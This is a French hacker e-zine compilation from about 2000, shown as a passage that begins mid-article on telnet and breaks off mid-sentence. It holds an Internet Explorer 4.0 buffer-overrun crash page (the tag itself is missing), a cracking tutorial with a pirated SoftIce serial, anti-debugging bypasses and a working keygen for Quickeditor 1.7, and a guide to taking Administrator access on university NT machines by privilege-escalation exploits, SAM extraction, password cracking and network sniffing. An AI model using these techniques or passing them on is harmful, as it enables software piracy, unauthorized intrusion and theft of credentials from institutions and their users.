l'autre machine 2. Les options négociées, "do, don't, will, won't " (je fais, je ne fais pas, fais, ne fais pas) sert pour, par exemple, un terminal récent et un plus ancien, de profiter de toutes le confort du récent sans en rester pour cela a du nvt. Voicis un schéma d'une demande d'option x :A :Do x => B B :will x => A, alors l'option x est accepte et mise en action par les deux unités. 3. Une vue symétrique de chaque extrémité (terminal,…), c-à-d que chaque unité suit des regles pour eviter des erreurs que voicis : - chaque unite ne doit envoyer une requete que pour le changement d'option, pas pour, par indique dans quel mode on se trouve - si une unite recoit une requete lui demandant de changer de mode alors qu'il est deja dans ce mode, cette unite ne doit pas repondre pour eviter les boucles infinies - si une requete pour modifier le mode dont les donnes doivent etre traite pour la transmission est envoyee, elle doit etre emise a l'endroit où la transmission change de mode. De nombreuses requete d'options vont surement s'entrecroiser lors d'un connection, chacune des deux unite essayant d'obtenir le mellieur service de l'autre unite. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************************************************* * Buffer Overrun de Microsoft Internet Explorer * ************************************************* Auteur : wHyAnGeL Date : 04.08.00 Titre : Buffer overrun de Microsoft Internet Explorer (MSIE) Tout d'abord qu'est-ce qu'un buffer overrun ? Le buffer c'est la zone pour le stickage temporarire dans la mémoire de la machine . Et l'overrun c'est un envahissement, un débordement. Combinez les deux et vous avez la réponse. Microsoft Internet Explorer (la version 4.0, je n'ai pas testé les autres) peut être crashé et enventuellement faire exécuter un code arbitraire avec le tag . Le voici : Il ouvre une boîte de dialogue et ferme IE 4.0. Il semble que cette longue extension de fichier cause un overrun au stack. (note : le stack c'est la zone dans la mémoire où il est possible de stocker de l'information et de la récupérer en ordre inverse à celui de l'entrée). Maintenant, le stack est complétement crashé avec ses propres valeurs, EIP aussi et CS=SS. On pourrait certainement construire une string (ligne) et l'exécuter à partir de la machine client, c'est à dire vous. A vous de voir ce que vous pouvez faire avec cet exploit. -----------------------coupez ici et enregistez sous crashmsie.html--------------------- Trying to crash IE 4.0 40 80 160 170 180 190 200 ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ **************************** * Tutorial de cracking n°3 * **************************** Auteur : GRIm@ -µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ- - «««««««« ¡ Underground Production ¡ »»»»»»» - - LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN - -µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ-µ <--------------------TAILLE IDEALE,800x6000-------------------------> CRACKING_BEGINNER n°03 by GRIm@, L'Apprenti Sorcier 0)INTRO: ££££££££ Salut, nous revoilà parti pour la suite de nos aventures !! Au menu cette fois-ci: - Installer SoftIce... - Configurer SoftIce.. - Commandes dans SoftIce... - Les indispensables de SoftIce... - SoftIce, SoftIce, SoftIce.... - Un Chti crack pour rester dans le mouvement NB: Si vous ne connaissez rien au cracking, il est indispensable de lire les n° 01 et 02 (et même comme ca, ca vas être DUR ! =-).. ) 1) SoftIce en lui-même: £££££££££££££££££££££££ Hé oui, vous aez compris, aujourd'hui nous allons parler de SoftIce... Mais qu'est ce donc que SoftIce ? Sous ce nom étrange au consonnace étrange, se cache l'outils préféré des crackerz, LE débuggeur absolu... Hé oui, car SoftIce est un débuggeur, il permet de tracer des programmes directement pendant leurs éxécution tout en voyant leur code assembleur... Cet outil est indispensable, et même s'il fait parfois peur aux newbies, il vous rendra de grand service... En fait SoftIce doit se lancer AVANT windoze, il sert en quelque sorte de sous-couche à celui-ci ce qui lui permet d'assurer des fonctions de débuggage trés pratiques et nottament des breakpoint sur les APIs... 2) SoftIce Install et Config ££££££££££££££££££££££££££££ On vas commencer par le début, l'installer (pour le trouver c'est facile, www.numega.com): Il vous demande d'abord un chti sérial, facile voici pour la version 4.01: 5103-00009B-9B... Aprés, vous décider du répertoire d'installation ainsi que du type de config, choissisez selon votre config (perso j'vous conseille d'utiliser les vga driver default pour votre carte graphique, sinon vous serez emmerdé !)... Quand il demande si vous voulez modifier autoexec.bat, dites non ! Aprés l'install, aller ajouter ecs lignes à la fin de votre autoexec.bat: ------------------CUT CUT CUT------------------ @echo off C:\WINDOWS\COMMAND\choice /T:n,05 Lancer SoftIce ? if errorlevel 2 goto fin c:\SOFTICE\WINICE.EXE rem : il faut remplacer le chemin par celui de l'install :fin ------------------CUT CUT CUT------------------ Pour ceux qui sont pas fort en scripting, au lancement, l'ordi demandera si vous voulez lancer SoftIce et au bout de 5 sec il choisira non (comme ca pas besion de rester à coté de l'ordi au moindre reboot...). Une fois ceci fait, il ne vous restera qu'a redémarrer votre ordinateur et à choisir oui quand il demandera si on veut avoir SoftIce (sinon à quoi ca sert ?!)... Tant que vous y êtes, vous devez aller aussi modifier dans le rep d'install le fichier winice.dat selon votre config et vos désir. Voici un exemple qui devrais foncionner: ------------------CUT CUT CUT------------------ PENTIUM=ON NMI=ON ECHOKEYS=OFF NOLEDS=OFF NOPAGE=OFF SIWVIDRANGE=ON THREADP=ON LOWERCASE=OFF WDMEXPORTS=OFF MONITOR=0 PHYSMB=64 ; Mettre le nb de RAM SYM=1024 HST=256 TRA=8 MACROS=32 DRAWSIZE=2048 INIT="LINES 60;CODE ON; X; FAULTS OFF;" ; Initialisation F1="h;" F2="^wr;" F3="^src;" F4="^rs;" F5="^x;" F6="^ec;" F7="^here;" F8="^t;" F9="^bpx;" F10="^p;" F11="^G @SS:ESP;" F12="^p ret;" SF3="^format;" CF8="^XT;" CF9="TRACE OFF;" CF10="^XP;" CF11="SHOW B;" CF12="TRACE B;" AF1="^wr;" AF2="^wd;" AF3="^wc;" AF4="^ww;" AF5="CLS;" AF8="^XT R;" AF11="^dd dataaddr->0;" AF12="^dd dataaddr->4;" CF1="altscr off; lines 60; wc 32; wd 8;" CF2="^wr;^wd;^wc;" ; WINICE.DAT ; (SIW95\WINICE.DAT) ; for use with SoftICE Versions greater than 3.0 (Windows 95) ; ************************************************************************* ; If your have MORE than 32MB of physical memory installed, change ; the PHYSMB line to the correct # of Megabytes. ; If you have LESS than 32MB you can save a bit of memory by ; specifying the correct # of Megabytes ; Example: PHYSMB=32 ; ************************************************************************* ; ***** Examples of sym files that can be included if you have the SDK ***** ; Change the path to the appropriate drive and directory ;LOAD=c:\windows\system\user.exe ;LOAD=c:\windows\system\gdi.exe ;LOAD=c:\windows\system\krnl386.exe ;LOAD=c:\windows\system\mmsystem.dll ;LOAD=c:\windows\system\win386.exe ; ***** Examples of export symbols that can be included ***** ; Change the path to the appropriate drive and directory EXP=c:\windows\system\vga.drv EXP=c:\windows\system\vga.3gr EXP=c:\windows\system\sound.drv EXP=c:\windows\system\mouse.drv EXP=c:\windows\system\netware.drv EXP=c:\windows\system\system.drv EXP=c:\windows\system\keyboard.drv EXP=c:\windows\system\toolhelp.dll EXP=c:\windows\system\shell.dll EXP=c:\windows\system\commdlg.dll EXP=c:\windows\system\olesvr.dll EXP=c:\windows\system\olecli.dll EXP=c:\windows\system\mmsystem.dll EXP=c:\windows\system\winoldap.mod EXP=c:\windows\progman.exe EXP=c:\windows\drwatson.exe ; ***** Examples of export symbols that can be included for Windows 95 ***** ; Change the path to the appropriate drive and directory EXP=c:\windows\system\kernel32.dll EXP=c:\windows\system\user32.dll EXP=c:\windows\system\gdi32.dll EXP=c:\windows\system\comdlg32.dll EXP=c:\windows\system\shell32.dll EXP=c:\windows\system\advapi32.dll EXP=c:\windows\system\shell232.dll EXP=c:\windows\system\comctl32.dll EXP=c:\windows\system\crtdll.dll EXP=c:\windows\system\version.dll EXP=c:\windows\system\netlib32.dll EXP=c:\windows\system\msshrui.dll EXP=c:\windows\system\msnet32.dll EXP=c:\windows\system\mspwl32.dll EXP=c:\windows\system\mpr.dll ------------------CUT CUT CUT------------------ 3) SoftIce Comment ca marche ? ££££££££££££££££££££££££££££££ 3.1) Overlook µµµµµµµµµµµµµ Bon maintenant finis de rigoler on vas regarder un peux comment marche ce fameux monstre... Quand vous êtes dans windob, pour basculer sous softice, il suffit de faire CTRL-D (et inversément pour revenir à windob... N'ayez sourtout pas peur en voyant la "gueule" de l'interface, elle est certes sobre, mais trés ergonomique et puissante... La fenêtre est séparée en trois partie principale, (du moins normalement, sinon essayer ces commandes: wr on, wd on,...) la premiére c'est celle des registres, vous vous rapelez, oui ces trucs bizzare qui on des nom zarbi commme eax, ebx, ecx, etc (ca c'est pas un registre)... Bon ben dans cette fenêtre on peut suivre en direct l'êtat des registres, ou autrement dit, leurs valeurs (On y voit également les flags, mais j'en parle pas). La deuxiéme fenêtre, contient l'EIP (c'est le n° de la ligne ou on est dans le prog) ansi que les instructions en hexa et en assembleur (si c'est pas le cas, essayer "code on"). On peut y suivre en direct le déroulement du programme et éventuellement changer certaine instructions. On peut normalement y voir aussi le nom du programme qui est en train d'être tracé. La troisiéme fenêtre est celle des commandes, elle permet d'entrer et de voir l'historiques des commandes. SoftIce y affiche aussi diverses informations sur le chargement et le déchargement d'objet. Softice est aussi livré avec un utilitaire trés utile, le Loader. Ce programme fonctionne sous win et permet de lancer des applications, jusque là c'est pas extraordinaire, mais ce qui est pratique, c'est que les apps lancée avec le loader s'arréte toute seule sur leur premiére instructions et vous vous retrouvez dans SoftIce pour pouvoir la tracer depuis le début... 3.2) Commandes de base µµµµµµµµµµµµµµµµµµµµµµ Il existe plusieurs commandes que vous devez ABSOLUMENT connaitre par coeur, en voici quelques une expliquées: F5 Permet de re-lancer le programme (la même chose que CTRL-D) F6 Permet de placer le focus (votre curseur) sur le code ou de revenir dans les instructions F8 Permet de tracer (avancer ligne par ligne) le programme. Quand on rencontre un call, on rentre à l'intérieur, et donc on trace TOUTES les instructions F10 Permet de tracer (avancer ligne par ligne) le programme. Quand on rencontre un call, on ne rentre pas à l'intérieur, et on saute sur la prochaine ligne sans voir les instrucions F12 Permet de tracer tout seul jusqu'au prochain ret (quand on est dans une routine (un call) et que on veut revenir à l'appel) bpx Permet de poser un breakpoint sur une ligne ou une API bl Permet d'afficher les breakpoint bc Permet d'effacer un breakpoint (faire bc [n° du breakpoint]) bd Désactiver un breakpoint be Activer un breakpoint r fl Permet d'inverser un flag, souvent utilisé avec r fl z pour transformer un JE en un JNE et inversément. a Permet d'éditer le code assembleur. On peut remplacer les instructions du programmes par de nouvelles instructions (effectif seulement en mémoire, quand le prog se ferme, les modifs s'effacent) line Permet de choisir le nombre de ligne d'affichage (conseil, minimum LINES 60) ver La version de SoftIce hboot Permet de relancer l'ordi (utile en cas de plantage) help Permet d'affciher toutes les commandes ainsi qu'une explication sur celle-ci: [command] /?) Bon, je crois que c'est tout, remarquez que cette liste est loin dêtre exaustive... 4) Utiliser SoftIce £££££££££££££££££££ Bien, bien, on vas se faire un exemple théorique (en ce sens que ce n'est pas un exemple réel). On veut par exemple cracker un programme qui aprés 30 jours nous affiche un message puis quitte. La technique du Dead-Listing (déssasemblage avec WDAsm et recherche dans les strings ref) n'ayant rien donné (ca arrive assez souvent malheureusement), on vas essayer avec SoftIce. Tout d'abord, on vas réfléchir comment on vas procéder: On pourrait utiliser le loader et tracer depuis le début, mais ce n'est pas une bonne iddée, car il se peut qu'il y ai plein de routine avant que le message s'affiche. Non, réfléchissez à ce que je vous ai dit tantot, avec SoftIce on peut poser des breakpoint sur les API de windows (ce sont les fonctions de windows qu'un prog peut utiliser). Or, quand notre prog nous affiche notre message de 30 jour dépassé, il utilise une fonction de windows trés usitée par (presque) tous les programmes, l'API messageboxa. On vas donc piéger le prog par là ! Pour ce faire, il faut basculer sous SoftIce (CTRL-D) puis faire : bpx messageboxa Ensuite vous pouvez revenir sous win (re CTRL-D ou F5). A ce moment, il ne reste plus qu'à lancer notre prog, et on se retrouve instantanément sous SoftIce qui nous afiche qu'un prog à apellé la fonction messageboxa. Bon tout ca c'est cool, mais c'est pas génial, car on est pas dans notre prog, en effet on se trouve dans kernel32 (ou user32 je sais plus) qui est le noyau de windows. Pour revenir dans le prog qui a appelé messageboxa, y'a pas 36 solutions, il faut utiliser F12 et souvent plusieurs fois. Aprés chaque F12, vous devriez voir que le prog actuellement visible change, il vous faut continuer a faire F12 jusqu'à ce que vous soyez revenu dans le prog qui nous inréresse. Une fois là, vous devriez vous trouvez juste sur l'instruction aprés l'appel à l'API. A ce moment la, il ne reste plus qu'a retrouver le test (souvent juste au dessus) qui nous aurait éviter ce désagréable message d'erreur et qui aurait permis au prog de continuer. Une fois celui-ci trouvé, il ne vous reste plus qu'à noter son adresse, puis à aller avec votre éditeur hexa favoris modifier le saut en conséquence... 5) Les Outils de SoftIce ££££££££££££££££££££££££ 5.1) Le Loader µµµµµµµµµµµµµµ Bon, je vous en ai déjà parlé de ce truc, c'est le programme qui est livré avec SoftIce et qui permet de lancer un prog pour le tracer avec SoftIce dés l'entry point (l'entry point, c'est là ou le programme exécute la premiére ligne)... Cet outil est assez utile (même si parfois il ne marche pas, mais ca on en reparle au n°4...) et trés simple d'utilisation. Pour lancer un programme, il suffit de faire file/load module, puis de séléctionner un exécutable. Ensuite, il ne reste qu'a clicker sur l'icône Load dans la barre d'icône pour que le programme se lance (il se peut qu'un message d'erreur apparaisse disant qu'une erreur est apparue lors de la traduction des symboles, répondez oui et n'y pensez plus (moi j'ai ca pour tous les progs...). 5.2) Frog's Ice µµµµµµµµµµµµµµµ Comment parler de SoftIce sans parler de frog's ice... Frog 's Ice permet d'empécher la détection de SoftIce par certain programme (voir le point 6). Il est également trés simple d'utilisation, il suffit de le lancer et il se cache dans la barre d'icone et plus besoin de rien faire... Il logge tous les tentatives de détection et les fait échouer automatiquement... Le must, il se protége lui-même contre la détection... Vous pouvez aussi être prévenu par un joli écran bleu de la mort de toutes tentative de détection de SoftIce... La version 1.00 vient de sortir, donc n'hésitez surtout pas à aller le downloader, c'est un indispensable ! 5.3) IceDump µµµµµµµµµµµµ IceDump, comme son nom l'indique est un dumper intégré à SoftIce, c'est à dire, un programme qui vas copier une partie de la mémoire pour le remettre dans un fichier... Dans sa derniére version (icedump 6.016 & nticedump 1.8 2000/04/27), il est parfaitement intégré à SoftIce, en lui ajoutant des commandes et avec ses multiples options (y'a même un player MP3)... Bref, IceDump est un programme à posséder, même si son utilisation reste rare avec le fameux ProcDump... 6) Détection de SoftIce £££££££££££££££££££££££ A cause de son immense succés auprés des crackerz, certain malfaisant personnage ont eu l'idée d'intégrer une détection de SoftIce dans leurs produits, empéchant ainsi l'exécution du prog si le débuggeur était en mémoire... Mais gràce à un certain +Frog 's Print (une 3l33t3 comme y'en a pas deux, francophone en plus), un porg nommé Frog's Ice est apparu, faisant disparaitre ainsi ces quelques petit inconvénient (Voir 5.2)... Je ne pourrais pas parler ici de toutes les méthode anti SoftIce, mais je vais vous parlez de la plus connue, appelée MeltIce. MeltIce historiquement est la premiére méthode de détection, puisque c'est celle que le Loader utilisait pour savoir si SoftIce était présent, quelque programmeurs rusé ont eu envie de copier cette technique et ainsi est apparu MeltIce. Cette technique est assez simple, elle utilise l'API CreateFileA, et lui passe comme argument le fichier "\.\\SICE". Si softice est en mémoire, l'Api retourne quelque chose, sinon elle retourne 0 (la valeur de retour est dans eax). Il suffit aprés au programme de tester eax pour savoir si SoftIce est là ou pas... Pour se débarraser de ca, il suffit de poser un breakpoint sur l'APi en faisant bpx createfilea. Cela peut servir, mais honnnètement, Frog's Ice est amplement suffisant pour toutes les techniques de détection (voir sa doc pour plus d'info...). 7) Un chti crack ££££££££££££££££ Bha, fot bien rester un peux sur de la pratique, pas que de la théorie alors voici un pti crack que j'avais fait il y a quelque mois pour [Zone14] (http://zone14.cjb.net) et ou j'utilisait SoftIce pour une des premiére fois... Aller bonne lecture... ! ------------CUT CUT CUT--------------------------------------------------------------- Quickeditor 1.7 Par GRIm@ Nom du Prog: Quickeditor Version : 1.7 Infection : Nag, fonction protégée Outils : WDASM et (un peux) SoftIce Niveau : Facile, Newbies expérimenté Salut, voici la suite de mes aventures dans le monde du shareware. Alors, aujourd'hui on s'attaque à Quickeditor, un petit prog qui permet de créer des film au format Quicktime. Bref, c'est pas ca qui compte. Aujourd'hui aussi, et ce pour la premiére fois, j'utiliserai SoftIce. En fait, étant toujours un newbies, je n'avais jamais réellement utilisé cet outils, donc si j'me goure quelque part, soyez indulgent... Première approche ----------------- On installe le prog, et on regarde. Un nag au lancement, un menu register. On essaye un nom bidon, et là, ni message d'erreur, ni quoi que ce soit, juste les infos qu'on à entré qui s'efface. Mince alors, on vas pas pouvoir désassembler le prog et chercher dans les trings, y'en aura pas ! Comment faire ? Première Attaque ---------------- On ne se décourage pas, et on décide d'utiliser tout les outils à notre disposition, à savoir notre cervaux (trés utile des fois), et SoftIce. Pour ceux qui ne connaisent absolument rien de SoftIce, sachez quand même qu'il s'agit d'un déboggeur, et je vous invite à lire de la documentation sur celui-ci (dispo sur le net, ou en demand à grima@hotmail.com). On lance le programme avec le Symbol Loader, et SoftIce breake, on est dans le prog. La-dessus, on appuie sur F5, et on laise continuer l'exécution. On clicke sur register, on rentre de fausses infos, puis avant de clicker sur ok, on bascule dans SoftIce (CTRL-D). Il nous faut maintenant poser un breakpoint pour que le programme s'arréte pendant la vérification du sérial. Une des solutions reste de mettre un break sur HMEMCPY; c'est plutot radical. Pour ce faire, il suffit d'entrer la commande "BPX HMEMCPY". Ensuite, cacher SoftIce (avec un nouveau CTRL-D), et cliquer sur le bouton ok. Ca ne tarde pas, SoftIce breake immédiatement et on se retrouve dans le code. Seulement voilà, il y a un problème, on est pas dans le code de l'application on est dans celui de KERNEL32. Pour revenir dans SoftIce, il suffit d'appuier plusieurs fois sur F12 pour que le nom de l'application apparaisent en bas du premier cadre. Une fois que vous y êtes, il suffit de tracer avec F9. On arrive vite à un endroit intéressant, au alentour de 00401CD6. Il ne nous reste qu'a noter l'adresse, et à désassembler le prog avec WDASM. Une fois ceci fait, vous aller à l'adresse que vous avez notée, et vous observez ceci: * Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EB, "" | :00401C23 68EB030000 push 000003EB :00401C28 55 push ebp * Reference To: USER32.GetDlgItemInt, Ord:00F4h | :00401C29 FF1508654300 Call dword ptr [00436508] :00401C2F 8D4C2418 lea ecx, dword ptr [esp+18] :00401C33 6A0F push 0000000F :00401C35 51 push ecx :00401C36 8BF8 mov edi, eax * Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EC, "" | :00401C38 68EC030000 push 000003EC :00401C3D 55 push ebp :00401C3E 897C2440 mov dword ptr [esp+40], edi * Reference To: USER32.GetDlgItemTextA, Ord:00F5h | :00401C42 FF15FC644300 Call dword ptr [004364FC] :00401C48 8BD8 mov ebx, eax :00401C4A 6683FB06 cmp bx, 0006 :00401C4E 0F8C82000000 jl 00401CD6 :00401C54 6683FF0A cmp di, 000A :00401C58 7C7C jl 00401CD6 :00401C5A 663BDE cmp bx, si :00401C5D 7E29 jle 00401C88 :00401C5F 8D7C2418 lea edi, dword ptr [esp+18] * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401C82(C) | :00401C63 8A17 mov dl, byte ptr [edi] :00401C65 52 push edx :00401C66 E875460100 call 004162E0 :00401C6B 8BCE mov ecx, esi :00401C6D 83C404 add esp, 00000004 :00401C70 0FAFC8 imul ecx, eax :00401C73 8B442414 mov eax, dword ptr [esp+14] :00401C77 03C1 add eax, ecx :00401C79 46 inc esi :00401C7A 47 inc edi :00401C7B 663BF3 cmp si, bx :00401C7E 89442414 mov dword ptr [esp+14], eax :00401C82 7CDF jl 00401C63 :00401C84 8B7C2430 mov edi, dword ptr [esp+30] * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401C5D(C) | :00401C88 663B7C2414 cmp di, word ptr [esp+14] :00401C8D 7518 jne 00401CA7 :00401C8F 6A01 push 00000001 :00401C91 55 push ebp * Reference To: USER32.EndDialog, Ord:00B4h | :00401C92 FF1510654300 Call dword ptr [00436510] :00401C98 B801000000 mov eax, 00000001 :00401C9D 5F pop edi :00401C9E 5E pop esi :00401C9F 5D pop ebp :00401CA0 5B pop ebx :00401CA1 83C41C add esp, 0000001C :00401CA4 C21000 ret 0010 On vois parfaitement que le prog fait appel à deux APIs, GetDlgItemInt et GetDlgItemTextA, qui serve respectivement à retrouver un nombre et un texte d'une boite de dialogue. A votre avis, que récupére donc l'application, sinon un code et un nom ? =-). Juste aprés, l'application effectue une série de test pour vérifier si le nom faitg au moins 6 caractéres, et que le code est plus grand que 10 (y'a aussi une autre valeur testée, mais je sais pas c'est quoi !). Ensuite, se trouve une drôle de routine, qui se rappelle elle-même. En gros, voici en "pseudo-code" ce que l'app fait: saisie du nom Boucle le_nombre_de_lettre saisie_d'une_lettre Appel d'une fonction(lettreposition) /* cette fonction est un peux longue, sinon je l'aurais /* mise, elle recoit en argument une lettre, et renvoie /* un chiffre pour cette lettre multiplication de la valeur récupérée par la position dans la chaine /* la 1er lettre=position 0 incrémentation d'une variable avec la valeur précédante continue_boucle si_nombre_de_lettre différent_de nombre_total_de_lettre test valeur_entrée, valeur calculée /* on teste le code entré avec le code calculé. En gros, le schéma n'est pas trés difficile, il suffit de connaitre la valeur assignée à chaque lettre puis de multiplier cette valeur par la position de chaque lettre dans le nom, et enfin d'additionner toute ces valeurs pour obtenir un sérial. Comme c'est assez simple, nous allons réaliser un petit KeyGen. Voici les sources de ce KeyGen fait en Visual Basic, text1 représente l'entrée du nom, et text2, le sérial: Private Sub Command1_Click() Dim longeur As Integer, position As Integer, valeur As Integer Dim caractere As String, serial As Integer If Text1.Text = "" Then Exit Sub longeur = Len(Text1.Text) If longeur < 6 Then MsgBox "Votre nom doit faire au moins 6 caractére", vbApplicationModal, "Espéce de Lamer ;-)" Exit Sub End If Do Until position = longeur caractere = Mid(Text1.Text, position + 1, 1) valeur = GetNumer(caractere) valeur = valeur * position serial = serial + valeur position = position + 1 Loop Text2.Text = Str(serial) End Sub Private Function GetNumer(lettre As String) As Integer Select Case UCase(lettre) Case "A" GetNumer = 1 Case "B" GetNumer = 6 Case "C" GetNumer = 5 Case "D" GetNumer = 4 Case "E" GetNumer = 2 Case "F" GetNumer = 6 Case "G" GetNumer = 7 Case "H" GetNumer = 12 Case "I" GetNumer = 9 Case "J" GetNumer = 10 Case "K" GetNumer = 19 Case "L" GetNumer = 12 Case "M" GetNumer = 13 Case "N" GetNumer = 14 Case "O" GetNumer = 15 Case "P" GetNumer = 3 Case "Q" GetNumer = 7 Case "R" GetNumer = 18 Case "S" GetNumer = 19 Case "T" GetNumer = 15 Case "U" GetNumer = 21 Case "V" GetNumer = 16 Case "W" GetNumer = 3 Case "X" GetNumer = 8 Case "Y" GetNumer = 2 Case "Z" GetNumer = 56 Case Else GetNumer = 0 End Select End Function Vous voyez que la fonction GetNumer est exactement la même que celle en assembleur du programme. Les lettres majuscules et minuscules recoivent la même valeur, et certaine lettres ont également la même valeur. J'ai mis le KeyGen compilé dans le zip pour ceux qui n'ont pas VB (beaucoup d'entre vous normalement)(comment ca non !?! ;-). S'il n'y est pas, aller voir sur le site de Zone14, ou demander-le à grima@hotmail.com. Voilà qui termine nos aventure pour aujourd'hui, mais point d'inquiétude, i'll be back soon... Je dédie ce crack à Synt, paske j'ai gagné notre paris ;-)... About, je voudrais dire ma grande déception et ma profonde tristesse par rapport à la fermeture de MadChat. La scéne vient d'en prendre un coup, mais pas d'inquiétude, nous sommes tous là pour continuer et perséverer pour faire un monde meilleur... Sur ce, bye all... GRIm@ , l'Apprenti Sorcier -------------------------END CUT - END CUT - END CUT ------------------------------- 8) Adresses utiles ££££££££££££££££££ Quelque adresse qui servent: http://Zone14.cjb.net C'est mon groupe (pub!) http://protools.cjb.net Tous les outils pour cracker !!! http://www.multimania.com/christalpage/ Le site de +Christal avec plein de truc sur les anti-softice... 9)END £££££ Bon aller on se quitte, mais snif, ne pleurez pas, je reviendrai encore dans le n°4... Déjà prévu: Les outils, déboguage avec WDASM, compression + cryptage, structure des EXE (PE header) puis ptêt un truc sur les protec commerciales... Sinon, ben bonne chance, et n'oubliez pas de lire beaucoup pendant les vacances ;-)... Pour finir, cette petite phrase que je repique de je ne sais plus ou: "Ne finissez jamais de commencer à apprendre, et ne commencer jamais à finir d'apprendre !" #EOF CRACKING_BEGINNER n°03 26-06-2000 _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ***************** * Hack your Fac * ***************** Auteur : Cyrius ThE HaCkeR CyRiUsViRuS cyriusvirus@yahoo.fr Le materiel necessaire est :-Un account sur une becanne de la fac.. -Une becanne avec Unix et/ou NT.. (Si vous avez pas NT c'est pas la peine...) -Une legere connaissance des OS.. -Une conscience.. Je vais vous expliquer comment obtenir les acces Admin de votre Fac sous NT . I . Le Password Admin Local sous NT 1. Details sur NT NT est en theorie un systeme d'exploitation beneficiant de la certification C2. Ce qui signifie qu'il est au plus haut point de securite possible des OS. J'ai bien dit en THEORIE ;) Il y a plusieurs composants tres interressants dans NT. Le LSA(Local Security Authority) qui gere les login et les audits. Le SAM (Security Account Manager) qui contient les passwords et les donnes au LSA. Enfin le SRM (Security Reference Monitor) qui genere les messages d'audits et renforce la securite du LSA. Qu'est-ce qu'un audit, vous me direz... Un audit et un executable que l'Admin lance sur certains fichier, programmes ou repertoires, et qui notte qui a utilise ce fichier et pendant combien de temps. Il n'y a pas que l'audit qui est tres chiant; y'a aussi les Service Packs... Ce sont des programmes qui sont crees par MS pour corriger des bugs dans NT qui pourraient constituer des trous de securitee. Au jour ou j'ecrit ce texte, le SP4 vient de sortir. Enfin je crois qu'il y a pas si longtemps. 2. Passwords sous NT Le password est contenu dans un fichier nomme SAM. Ce fichier existe en plusieurs exemplaires. Celui qui est utilise par NT est le fichier SAM (ou Sam.log) situe dans le repertoire WINNT\SYSTEM32\CONFIG\SAM. Le probleme est que ce fichier est utilise par NT et donc illisible avec NT demarre!!! Mais pas de probleme car NT est pas intelligent et a peur de le perdre; c'est pourquoi il le sauvegarde dans un fichier sam.sav. Il existe aussi le fichier Sam_ qui contient le pass Admin au moment de l'installation mais si l'admin est pas trop con il l'aura change.... 3. Passer Aministrateur sous NT en local Ca peut etre tres pratique pour installer des progs qui demandent d'etre Admin... a) La Solution Getadmin Pour passer root sous NT il y a plusieurs solutions biensur. La premiere est d'utiliser un exploit nommé Getadmin.exe. Le probleme est que cet exploit est patche par le Service Pack 3. Mais mais mais, il y a toujours une solution, elle se nomme Crash4.exe. Ce dernier programme est a utiliser si le SP3 est installe sur votre machine, il remet en place quelques trucs dans la pile de NT et autorise l'utilisation de Getadmin.exe. Comment savoir si le SP3 est installe? C'est tres simple, il vous suffit de le copier dans le repertoire c:\temp (vous y avez les droits ;) avec son DLL GASYS.DLL et executez le en tapant getadmin GUEST (ou tout autre compte que vous voulez passer en root). Si ca marche pas de probleme sinon il vous faudra executer Crash4.exe et ensuite reexecuter Getadmin. b) L'extraction du fichier Sam Une autre solution bien plus amusante est de chopper le password Administrateur. Pour cela on va recuperer le fichier Sam... Le probleme est que ce fichier est utilise par NT et donc il est innaccessible. Il y a toute fois une solution. Elle consiste a booter sur une disquette (donc sous DOS) et de monter la partition NTFS grace a un programme nomme ntfsdos.exe. Ce programme permet de monter la partition NTFS et donc de pouvoir lire dessus sans aucune restriction habituelle. On pourra donc recuperer le password Admin et le cracker ensuite. Mais avant il faut le dumper car il est code. Pour cela il faut utiliser Pwdump.exe ou Samdump.exe, le fichier est ainsi lisible (mais le pass est toujours crypte). Une autre solution pour le dumper est d'utiliser le cracker de passwords L0pthcrack. Vous devrez de toute facon passer par ce prog car c'est le meilleur cracker de pass NT que je connaisse. Ca prendra surement du temps mais ca vaut le coup ;) II . Le password Admin sur le reseau Pour ce pass faudra gruger un peu (reflechir en bon francais...). La config de votre reseau est tres importante vous vous en doutez. Le mieux c'est d'avoir un reseau Ethernet. Plusieurs solutions se presentent alors a vous : sniffer au moment du login ou sniffer au moment de la recuperation des mails. Pour sniffer au login rien de plus simple, il vous suffira d'utiliser encore une fois L0phtcrack. Le dernier en date, le 2.51 l'integre graphiquement. c'est trop fun non??? Alors vous le lancez et vous attendez. Perso je n'ai pas teste la derniere version mais dans les versions precedentes leur prog readsmb marche tres bien, on peut donc esperer qu'ils n'ont pas regresse... Le probleme de ce systeme est que l'on devra cracker quand meme les pass. En effet, NT transmet les passwords sur le reseau (de la station vers le serveur) mais ce con les transmets cryptes... Ceci dit c'est deja pas mal et ca peut etre extremement pratique!!! La deuxieme solution est si vous avez un serveur de mail de sniffer les echanges avec ce serveur. Le service POP3 de NT n'est pas securise et les pass sont transmis sans etre codes ;) et la on se marre reellement mouahahahah. Installez le sniffer entre le serveur NT et le serveur de mails... Et voilou. Pour cela je ne saurais trop vous conseiller le programme sniffit qui tourne sous Unix et qui est a mon avis Le meilleur sniffer existant. Testez le et vous verrez. Bien sur si l'admin n'est pas trop CON, vous n'aurez jamais sont pass meme en crypte (faut pas rever quand meme). Ceci dit les admins sot parfois tres cons! Attention ne revez pas, ce n'est pas fini. Car si vous voulez reellement le password Administrateur (petit defi perso), il vous faudra utiliser par exemple (encore une fois) L0phtcrack. ET OUI!!! Pour ce faire vous devrais, avec des droits admin normalement, modifier dans la base de registre une variable pour pouvoir par la suite recuperer tous les passwords de votre reseau. La cle est 